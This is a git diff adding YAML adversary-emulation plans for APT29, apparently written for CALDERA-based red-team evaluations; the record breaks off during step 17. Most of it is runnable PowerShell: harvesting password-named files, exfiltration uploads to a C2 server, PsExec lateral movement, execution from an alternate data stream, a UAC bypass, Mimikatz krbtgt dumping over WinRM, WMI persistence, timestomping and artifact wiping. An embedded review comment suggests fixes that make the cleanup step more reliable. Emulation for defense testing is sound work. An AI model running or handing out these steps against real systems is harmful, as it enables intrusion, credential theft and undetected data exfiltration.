{ + write-host "[+] Data exfil of download directory completed!"; + } else { + write-host "[!] Data exfil failed!"; + } + + payloads: + - upload.ps1 + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Write-Host "[*] Compressing all the things in download dir"; + Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; + + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; + if ($?) { + write-host "[+] Data exfil of download directory completed!"; + } else { + write-host "[!] Data exfil failed!"; + } + +# Step 8 - Lateral Movement + +# Where is "Copy payload to webdav share:" + +- id: 95564347-e77a-4a89-b08f-dcafa5468f2c + name: Remote System Discovery (T1018) + description: Custom PowerShell script to perform AD triage for domain bound computers. + tactic: execution + technique: + attack_id: T1059.001 + name: "Command and Scripting Interpreter: PowerShell" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_execution + procedure_step: "8.A.1" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Ad-Search Computer Name *; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. 
Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Ad-Search Computer Name *; + +- id: c4a59e39-53b0-4ace-9528-8ff052752ece + name: Identifying current user on other machines + description: Custom PowerShell script to perform AD triage for domain bound computers. + tactic: execution + technique: + attack_id: T1059.001 + name: "Command and Scripting Interpreter: PowerShell" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_execution + procedure_step: "8.A.2" + platforms: + windows: + psh: + command: | + Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; + + executors: + - name: powershell + command: | + Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; + +- id: bddc0abc-07a0-41b7-813f-e0c64d9226b3 + name: Copy Sandcat File + description: Copy Sandcat file using PsExec + tactic: lateral-movement + technique: + attack_id: T1105 + name: "Ingress Tool Transfer" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_lat_movement + procedure_step: "8.B" + platforms: + windows: + psh,pwsh: + command: | + move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; + set-location "C:\Program Files\SysinternalsSuite\"; + .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; + tasklist /S 
#{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; + payloads: + - sandcat.go-windows-upx + + input_arguments: + pivot_machine_hostname: + description: Hostname of pivot machine + type: string + default: pivothost + + user.session.id: + description: Session id for user + type: string + default: "1" + + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + +- id: 00446217-53ca-4749-bacd-f41fe189d36e + name: Startup Folder Persistence Execution + description: Sets credentials for a headless RDP session to spawn triggering startup folder persistence. + tactic: lateral-movement + technique: + attack_id: T1037.005 + name: "Boot or Logon Initialization Scripts: Startup Items" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_lat_movement + procedure_step: "10.B" + platforms: + windows: + psh,pwsh: + command: | + cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; + mstsc /v:127.0.0.2; + sleep 10; + Get-Process -name mstsc; + if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + profile_user_password: + description: Password of profile user + type: string + default: Password123! + + executors: + - name: powershell + command: | + cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; + mstsc /v:127.0.0.2; + sleep 10; + Get-Process -name mstsc; + if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} + +- id: 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92 + name: Artifact Cleanup + description: Delete file artifacts left from the operation. 
+ tactic: defensive-evasion + technique: + attack_id: T1070.004 + name: "Indicator Removal on Host: File Deletion" + cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + procedure_group: procedure_def_evasion + procedure_step: "10.A.3" + platforms: + windows: + psh,pwsh: + command: | + Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; + Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; + Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; + if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { + Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; + } else { + write-host "[!] File did not exist to be removed!"; + } + + if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { + Remove-Job -Name "Keystrokes"; + if ($?) { + write-host "[+] Job \"Keystrokes\" was remove."; + } + } else { + write-host "[!] Job \"Keystrokes\" did not exist."; + } + + if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { + Remove-Job -Name "Screenshot" -Force; + write-host "[+] Job \"screenshot\" was removed."; + } else { + write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; + } + remove-item upload.ps1 -Force; + + executors: + - name: powershell + command: | + Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; + Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; + Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; + if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { + Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; + } else { + write-host "[!] 
File did not exist to be removed!"; + } + + if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { + Remove-Job -Name "Keystrokes"; + if ($?) { + write-host "[+] Job \"Keystrokes\" was remove."; + } + } else { + write-host "[!] Job \"Keystrokes\" did not exist."; + } + + if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { + Remove-Job -Name "Screenshot" -Force; + write-host "[+] Job \"screenshot\" was removed."; + } else { + write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; + } + remove-item upload.ps1 -Force; + +# Step 10 - Persistence Execution + +- id: 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe + name: Scheduled Task + description: Reboot the machine to aid in peristence callbacks + tactic: impact + technique: + attack_id: T1529 + name: "System Shutdown/Reboot" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_impact + procedure_step: "10.A" + platforms: + windows: + psh,pwsh: + command: | + write-host "[*] Restarting Computer"; + Restart-Computer -Force; + + executors: + - name: powershell + command: | + write-host "[*] Restarting Computer"; + Restart-Computer -Force; diff --git a/apt29/Emulation_Plan/yaml/APT29-Day1.B.yaml b/apt29/Emulation_Plan/yaml/APT29-Day1.B.yaml new file mode 100644 index 00000000..62018f61 --- /dev/null +++ b/apt29/Emulation_Plan/yaml/APT29-Day1.B.yaml 
@@ -0,0 +1,132 @@
+# APT29-Day1.B.yaml - CALDERA and Atomic style TTPs
+
+- emulation_plan_details:
+ id: 7d264eae-7d49-4d89-96cd-df6b60914a6c
+ adversary_name: APT29 Day 1.B
+ adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. This adversary models scenario Day 1.B of the APT29.
+ attack_version: 8.1
+ format_version: 1.0
+
+- id: 08e57385-dbce-4850-8bb7-589ef79465ab
+ name: Automated document collection (T1119)
+ description: Execute PowerShell collection command to collect and compress files of specific extensions.
+ tactic: execution
+ technique:
+ attack_id: T1059.001
+ name: "Command and Scripting Interpreter: PowerShell"
+ cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html"
+ procedure_group: procedure_execution
+ procedure_step: "9.B.1"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ move-item Rar.exe -Destination C:\Windows\Temp -Force;
+ $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force;
+ cd C:\Windows\Temp;
+ .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip";
+ payloads:
+ - rar.exe
+
+ executors:
+ - name: powershell
+ command: |
+ move-item Rar.exe -Destination C:\Windows\Temp -Force;
+ $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force;
+ cd C:\Windows\Temp;
+ .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip";
+
+- id: 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6
+ name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041)
+ description: Copy a target file from a remote file share through the existing C2 channel
+ tactic: exfiltration
+ technique:
+ attack_id: T1041
+ name: "Exfiltration Over C2 Channel"
+ cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ procedure_group: procedure_exfiltration
+ procedure_step: "9.B.8"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ Import-Module .\upload.ps1 -Verbose -Force;
+ Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload";
+ cleanup: |
+ remove-item upload.ps1 -Force
+ payloads:
+ - upload.ps1
+
+ input_arguments:
+ profile_user:
+ description: Name of profile user
+ type: string
+ default: Administrator
+
+ server:
+ description: IP or Hostname of server
+ type: string
+ default: 192.0.2.10
+
+ executors:
+ - name: powershell
+ command: |
+ Import-Module .\upload.ps1 -Verbose -Force;
+ Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload";
+ cleanup_command: |
+ remove-item upload.ps1 -Force
+
+- id: 208b021b-c79a-4176-8ad1-3af99ed50c6f
+ name: Artifact Cleanup - Delete Staged Files
+ description: Cleanup files related to Operation
+ tactic: defensive-evasion
+ technique:
+ attack_id: T1070.004
+ name: "Indicator Removal on Host: File Deletion"
+ cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ procedure_group: procedure_def_evasion
+ procedure_step: "9.C"
+ platforms:
+ windows:
+ psh,pwsh:
+ command: |
+ if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) {
+ mkdir "C:\Program Files\SysInternalsSuite";
+ }
+ set-location "C:\Program Files\SysInternalsSuite";
+
+ if (!$(test-path -path "sdelete64.exe")) {
+ iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip;
+ Expand-Archive sdelete64.zip -force;
+ }
+ copy sdelete64.exe C:\Windows\Temp\;
+ cd C:\Windows\Temp\ ;
+ .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe;
+ .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip;
+ .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip;
+ remove-item C:\Windows\Temp\sdelete64.exe -force;
+
+ input_arguments:
+ profile_user:
+ description: Name of profile user
+ type: string
+ default: Administrator
+
+ executors:
+ - name: powershell
+ command: |
+ if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) {
+ mkdir "C:\Program Files\SysInternalsSuite";
+ }
+ set-location "C:\Program Files\SysInternalsSuite";
+
+ if (!$(test-path -path "sdelete64.exe")) {
+ iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip;
+ Expand-Archive sdelete64.zip -force;
+ }
+ copy sdelete64.exe C:\Windows\Temp\;
+ cd C:\Windows\Temp\ ;
+ .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe;
+ .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip;
+ .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip;
+ remove-item C:\Windows\Temp\sdelete64.exe -force;
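Review bot: In step 9.C (both the `psh,pwsh` and `executors` copies), `copy sdelete64.exe C:\Windows\Temp\` right after `Expand-Archive sdelete64.zip -force` looks like it will fail on a first run, because `Expand-Archive` without `-DestinationPath` appears to extract into a `sdelete64\` subfolder of the current directory rather than the directory itself — worth confirming on the range, and if so the fix is `Expand-Archive sdelete64.zip -DestinationPath . -Force;`. The same block pulls SDelete from the internet at execution time with no integrity check, so the plan silently depends on egress and runs whatever is served, as Administrator; pinning a digest before extraction, e.g. `if ((Get-FileHash sdelete64.zip -Algorithm SHA256).Hash -ne "#{sdelete_sha256}") { write-host "[!] SDelete.zip hash mismatch"; exit 1; }` with a new `sdelete_sha256` input argument, keeps runs reproducible. A short comment above `if (!$(test-path -path "sdelete64.exe"))` noting that the check is relative to the preceding `set-location` (so a stale binary in `C:\Program Files\SysInternalsSuite` is reused without re-download) would also help the next operator.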
diff --git a/apt29/Emulation_Plan/yaml/APT29-Day2.yaml b/apt29/Emulation_Plan/yaml/APT29-Day2.yaml new file mode 100644 index 00000000..b8d1d2a4 --- /dev/null +++ b/apt29/Emulation_Plan/yaml/APT29-Day2.yaml 
@@ -0,0 +1,758 @@ +# APT29-Day2.yaml - CALDERA and Atomic style TTPs + +- emulation_plan_details: + id: 4aafe2ab-1c03-4ac1-aaa3-fdd69c305a0a + adversary_name: APT29 Day 2 + adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. This adversary models scenario Day 2 of the APT29. + attack_version: 8.1 + format_version: 1.0 + +# Step 11 - Initial Breach + +# .lnk payload +- id: e506f811-884d-4992-aacb-514b33a0324f + name: Click .LNK payload + description: Execute PowerShell collection command to collect and compress files of specific extensions. + tactic: execution + technique: + attack_id: T1204.002 + name: "User Execution: Malicious File" + cti_source: "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" + procedure_group: procedure_execution + procedure_step: "11.A" + platforms: + windows: + psh,pwsh: + command: | + Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; + + if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ + Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; + Write-Host "Removed old kxwn.lock file"; + } + + powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; + cleanup: | + Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; + + input_arguments: + profile_user_day2: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; + + if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ + Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; + Write-Host "Removed old kxwn.lock file"; + } + + powershell.exe Get-Content 
'.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; + cleanup_command: | + Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; + +# Step 12 - Fortify Access + +- id: 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278 + name: Timestomp kxwn.lock + description: Timestomp kxwn.lock + tactic: defensive-evasion + technique: + attack_id: T1070.006 + name: "Indicator Removal on Host: Timestomp" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_def_evasion + procedure_step: "12.A" + platforms: + windows: + psh,pwsh: + command: | + if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { + write-host "[!] kxwn.lock was not found on this host."; + exit 1; + } else { + . .\timestomp.ps1; + timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; + } + payloads: + - timestomp.ps1 + + executors: + - name: powershell + command: | + if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { + write-host "[!] kxwn.lock was not found on this host."; + exit 1; + } else { + . .\timestomp.ps1; + timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; + } + +- id: f9c0b150-822f-497b-ad6d-187f24561e9a + name: Detect Anti-Virus + description: Detect anti-virus software on host + tactic: discovery + technique: + attack_id: T1518.001 + name: "Software Discovery: Security Software Discovery" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_discovery + procedure_step: "12.B" + platforms: + windows: + psh,pwsh: + command: | + . .\stepTwelve.ps1; + detectav + payloads: + - stepTwelve.ps1 + + executors: + - name: powershell + command: | + . 
.\stepTwelve.ps1; + detectav + +- id: 2b5a72b1-01e4-48ae-98b0-2570a7894371 + name: Detect Software + description: Detect software on host + tactic: discovery + technique: + attack_id: T1518 + name: "Software Discovery" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_discovery + procedure_step: "12.C" + platforms: + windows: + psh,pwsh: + command: | + . .\stepTwelve.ps1; + software; + payloads: + - stepTwelve.ps1 + + executors: + - name: powershell + command: | + . .\stepTwelve.ps1; + software; + +# Step 13 - Local Enumaration + +- id: 0cfadbcb-ec21-44ae-adb7-9a23176dd620 + name: Enumerate Computer Name + description: Triage host for ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysical,DnsFullyQualifie + tactic: discovery + technique: + attack_id: T1082 + name: "System Information Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "13.A" + platforms: + windows: + psh,pwsh: + command: | + . .\stepThirteen.ps1; + comp; + payloads: + - stepThirteen.ps1 + + executors: + - name: powershell + command: | + . .\stepThirteen.ps1; + comp; + +- id: 96140694-6d13-40b6-9553-0e63533469f3 + name: Enumerate Domain Name + description: Domain triage + tactic: discovery + technique: + attack_id: T1082 + name: "System Information Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "13.B" + platforms: + windows: + psh,pwsh: + command: | + . .\stepThirteen.ps1; + domain; + payloads: + - stepThirteen.ps1 + + executors: + - name: powershell + command: | + . 
.\stepThirteen.ps1; + domain; + +- id: f320eebd-e75b-4194-b529-79e64ad0b9ee + name: Enumerate Username + description: user triage + tactic: discovery + technique: + attack_id: T1033 + name: "System Owner/User Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "13.C" + platforms: + windows: + psh,pwsh: + command: | + . .\stepThirteen.ps1; + user; + payloads: + - stepThirteen.ps1 + + executors: + - name: powershell + command: | + . .\stepThirteen.ps1; + user; + +- id: a34ab8f2-a106-41fb-af0b-cf5382bd18ae + name: Enumerate Processes + description: Process triage + tactic: discovery + technique: + attack_id: T1057 + name: "Process Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "13.D" + platforms: + windows: + psh,pwsh: + command: | + . .\stepThirteen.ps1; + pslist; + payloads: + - stepThirteen.ps1 + + executors: + - name: powershell + command: | + . .\stepThirteen.ps1; + pslist; + +# Step 14 - Elevation + +- id: 5226e5dc-fc28-43b7-a679-0db49d520402 + name: UAC Bypass via sdctl + description: Invoke UAC bypass sdctl + tactic: defensive-evasion + technique: + attack_id: T1134.002 + name: "Access Token Manipulation: Create Process with Token" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_def_evasion + procedure_step: "14.A" + platforms: + windows: + psh,pwsh: + command: | + . .\stepFourteen_bypassUAC.ps1; + bypass; + payloads: + - stepFourteen_bypassUAC.ps1 + + executors: + - name: powershell + command: | + . 
.\stepFourteen_bypassUAC.ps1; + bypass; + +- id: 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24 + name: Stage Mimikatz Binary + description: Staging Mimikatz Binary for later execution + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + procedure_group: procedure_cred_access + procedure_step: "14.C" + platforms: + windows: + psh,pwsh: + command: | + write-host "[+] Successfully downloaded m.exe"; + payloads: + - m.exe + + executors: + - name: powershell + command: | + write-host "[+] Successfully downloaded m.exe"; + +- id: 4ef6009d-2d62-4bb4-8de9-0458df2e9567 + name: Credential Dumping + description: Dumping credentials via wmidump (Mimikatz) + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + procedure_group: procedure_cred_access + procedure_step: "14.B" + platforms: + windows: + psh,pwsh: + command: | + . .\stepFourteen_credDump.ps1; + wmidump; + payloads: + - stepFourteen_credDump.ps1 + + executors: + - name: powershell + command: | + . .\stepFourteen_credDump.ps1; + wmidump; + +# Step 15 - Establish Persistence + +- id: 43aad2d6-d16a-4adb-aa2b-9510a3be4c52 + name: WMI Persistence technique + description: user triage + tactic: persistence + technique: + attack_id: T1546.003 + name: "Event Triggered Execution: Windows Management Instrumentation Event Subscription" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_persistence + procedure_step: "15.A" + platforms: + windows: + psh,pwsh: + command: | + Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; + if ($?) { + write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; + exit 1; + } else { + . 
.\stepFifteen_wmi.ps1; + wmi; + if ($?) { + write-host "[+] WMI script has successfully executed!"; + exit 0; + } + exit 1; + } + payloads: + - stepFifteen_wmi.ps1 + + executors: + - name: powershell + command: | + Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; + if ($?) { + write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; + exit 1; + } else { + . .\stepFifteen_wmi.ps1; + wmi; + if ($?) { + write-host "[+] WMI script has successfully executed!"; + exit 0; + } + exit 1; + } + +# Step 16 - Lateral Movement + +- id: 1c8552c7-f7ed-4523-b640-72d65af5f855 + name: Enumerate Domain Controller + description: Get domain controller and current user SID for the domain + tactic: discovery + technique: + attack_id: T1018 + name: "Remote System Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "16.A" + platforms: + windows: + psh,pwsh: + command: | + . .\powerview.ps1; + get-netdomaincontroller; + payloads: + - powerview.ps1 + + executors: + - name: powershell + command: | + . .\powerview.ps1; + get-netdomaincontroller; + +- id: a42be479-fc26-4d7c-9e63-7a9b74e4c8d2 + name: Enumerate Domain SID + description: Get domain user SID + tactic: discovery + technique: + attack_id: T1033 + name: "System Owner/User Discovery" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_discovery + procedure_step: "16.B" + platforms: + windows: + psh,pwsh: + command: | + . .\stepSixteen_SID.ps1; + siduser; + payloads: + - stepSixteen_SID.ps1 + + executors: + - name: powershell + command: | + . 
.\stepSixteen_SID.ps1; + siduser; + +- id: acecc8f7-18c2-41fd-87bc-39ffd644e4e9 + name: Remote Connection (T1028) & Remote File Copy (T1105) & Credential Dumping + description: Establish connection to Domain Controller + tactic: lateral-movement + technique: + attack_id: T1105 + name: "Ingress Tool Transfer" + cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + procedure_group: procedure_lat_movement + procedure_step: "16.C-16.D" + platforms: + windows: + psh,pwsh: + command: | + . .\invoke-winrmsession.ps1; + $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; + Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; + if ($?) { + write-host "[+] Successfully copied m.exe to remote host"; + } else { + write-host "[!] Error, copying and executing m.exe on remote host"; + } + Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string + + payloads: + - invoke-winrmsession.ps1 + - m.exe + + input_arguments: + target.winrm.username: + description: Username of winrm target + type: string + default: Administrator + + target.winrm.password: + description: Password for winrm target user + type: string + default: Password123! + + target.winrm.remote_host: + description: IP or Hostname of remote host + type: string + default: 192.0.2.20 + + executors: + - name: powershell + command: | + . .\invoke-winrmsession.ps1; + $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; + Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; + if ($?) { + write-host "[+] Successfully copied m.exe to remote host"; + } else { + write-host "[!] 
Error, copying and executing m.exe on remote host"; + } + Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string + +# Step 17 - Collection + +- id: b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c + name: Collect E-mails + description: Perform e-mail collection from custom PowerShell module. + tactic: collection + technique: + attack_id: T1114.001 + name: "Email Collection: Local Email Collection" + cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" + procedure_group: procedure_collection + procedure_step: "17.A" + platforms: + windows: + psh,pwsh: + command: | + . .\stepSeventeen_email.ps1; + Write-Host "Emails Collected"; + payloads: + - stepSeventeen_email.ps1 + + executors: + - name: powershell + command: | + . .\stepSeventeen_email.ps1; + Write-Host "Emails Collected"; + +- id: fc231955-774f-442c-ac0e-e74dfda50c5c + name: Collect Files & Compress Collection + description: Collect a specific document from a target machine. + tactic: collection + technique: + attack_id: T1005 + name: "Data from Local System" + cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + procedure_group: procedure_collection + procedure_step: "17.B-17.C" + platforms: + windows: + psh,pwsh: + command: | + try{ + if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { + New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; + } + } catch { + write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; + exit 1; + } + + if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { + write-host "[!] 
